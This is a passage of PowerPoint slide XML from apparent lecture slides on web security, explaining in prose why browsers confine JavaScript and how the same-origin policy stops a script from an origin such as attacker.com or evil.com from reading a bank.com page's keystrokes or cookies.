              <a:gd name="T17" fmla="*/ 520481 h 896619"/>
              <a:gd name="T18" fmla="*/ 143839 w 137795"/>
              <a:gd name="T19" fmla="*/ 472856 h 896619"/>
              <a:gd name="T20" fmla="*/ 144962 w 137795"/>
              <a:gd name="T21" fmla="*/ 425293 h 896619"/>
              <a:gd name="T22" fmla="*/ 143113 w 137795"/>
              <a:gd name="T23" fmla="*/ 377789 h 896619"/>
              <a:gd name="T24" fmla="*/ 138293 w 137795"/>
              <a:gd name="T25" fmla="*/ 330348 h 896619"/>
              <a:gd name="T26" fmla="*/ 130500 w 137795"/>
              <a:gd name="T27" fmla="*/ 282971 h 896619"/>
              <a:gd name="T28" fmla="*/ 119737 w 137795"/>
              <a:gd name="T29" fmla="*/ 235650 h 896619"/>
              <a:gd name="T30" fmla="*/ 106001 w 137795"/>
              <a:gd name="T31" fmla="*/ 188399 h 896619"/>
              <a:gd name="T32" fmla="*/ 89293 w 137795"/>
              <a:gd name="T33" fmla="*/ 141208 h 896619"/>
              <a:gd name="T34" fmla="*/ 69613 w 137795"/>
              <a:gd name="T35" fmla="*/ 94070 h 896619"/>
              <a:gd name="T36" fmla="*/ 46961 w 137795"/>
              <a:gd name="T37" fmla="*/ 47015 h 896619"/>
              <a:gd name="T38" fmla="*/ 21338 w 137795"/>
              <a:gd name="T39" fmla="*/ 0 h 8966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7795" h="896619">
                <a:moveTo>
                  <a:pt x="0" y="896387"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="26434" y="848655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="50051" y="800985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70848" y="753376"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="88826" y="705829"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103986" y="658343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116326" y="610919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="125848" y="563556"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132551" y="516255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136435" y="469015"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="137500" y="421837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="135747" y="374720"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="131174" y="327665"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="123783" y="280671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113573" y="233739"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100544" y="186868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84696" y="140058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66029" y="93311"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44543" y="46624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20238" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="19645">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6068DE0-238D-9D40-97A4-F57A3CBE2BA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="812800"/>
            <a:ext cx="8515350" cy="957263"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="307434" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="6100" spc="-65" dirty="0"/>
              <a:t>What </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="150" dirty="0"/>
              <a:t>could </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="190" dirty="0"/>
              <a:t>go</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="-100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="-5" dirty="0"/>
              <a:t>wrong?</a:t>
            </a:r>
            <a:endParaRPr sz="6100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53463632-E2DC-D44F-A9A6-B47A9DCDB18F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="310832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4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{655BA060-61DB-B849-99A1-7CA64ACB8C11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1104900" y="3054350"/>
            <a:ext cx="7185025" cy="415925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2700" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Browsers </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="55" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>need </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" b="1" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>confine </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="20" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Javascript’s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="-35" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="45" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>power</a:t>
            </a:r>
            <a:endParaRPr sz="2700" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{471C792C-35A1-164D-A510-D2F55CE50D41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="3946525"/>
            <a:ext cx="157162"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6" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61A721FD-3B23-6E40-9621-F4C47ADE08F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1104900" y="3892550"/>
            <a:ext cx="7918450" cy="428625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2700" spc="20" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="65" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>script </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>attacker.com</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="-1155" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="40" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>should </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>not </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="95" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>be </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="50" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>able </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to:</a:t>
            </a:r>
            <a:endParaRPr sz="2700" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2DBD402-0FCB-B546-9004-954CEFA53FBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="4521200"/>
            <a:ext cx="158750" cy="319088"/>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8" name="object 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CA6F902-9AB6-1941-9FF9-874E801666E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="5097463"/>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9" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87623E6D-439B-5E4B-9871-6AF821C9BADC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="5672138"/>
            <a:ext cx="158750" cy="319087"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="325" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>•</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141322" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF21B299-E7A4-DC47-99CE-8EEDFE8B693F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="4464050"/>
            <a:ext cx="72517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r>
              <a:rPr lang="en-US" altLang="en-US" sz="2700" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Alter the layout of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00882B"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00882B"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2700" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4600"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="275"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2700" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Read user keystrokes from a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00882B"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00882B"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2700" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>page  Read cookies belonging to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00882B"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2700" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49"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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{364A8228-6930-A240-9B57-C882010DE917}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="234950" y="203200"/>
            <a:ext cx="4832350" cy="477838"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="82768" fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3100" spc="-155" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>am</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="122" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="-88" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="144" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="66" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>gi</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="44" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="298" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="122" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="66" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ol</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="-11" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="22" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="298" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="309" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="-155" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="88" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="144" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="309" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="object 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{665117B0-8668-344A-8F1F-CD33CCA0922F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="914400"/>
            <a:ext cx="9296400" cy="6629400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="142357" indent="-457200" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="103000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The problem:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Assume you are logged into Facebook and visit a malicious website in another browser tab. Without the same origin policy JavaScript on that website could do anything to your Facebook account that you are allowed to do through accessing the DOM associated with the Facebook page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="28057" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="55"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2200" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="28057" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Part of the solution:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The same-origin policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="28057" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="103000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1326"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" baseline="7000" dirty="0">
                <a:latin typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
                <a:cs typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>◮  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The SOP restricts how a document or script loaded from one origin (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>e.g.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="PMingLiU" pitchFamily="18" charset="-120"/>
                <a:ea typeface="PMingLiU" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>www.evil.com</a:t>
            </a:r>
            <a:r>
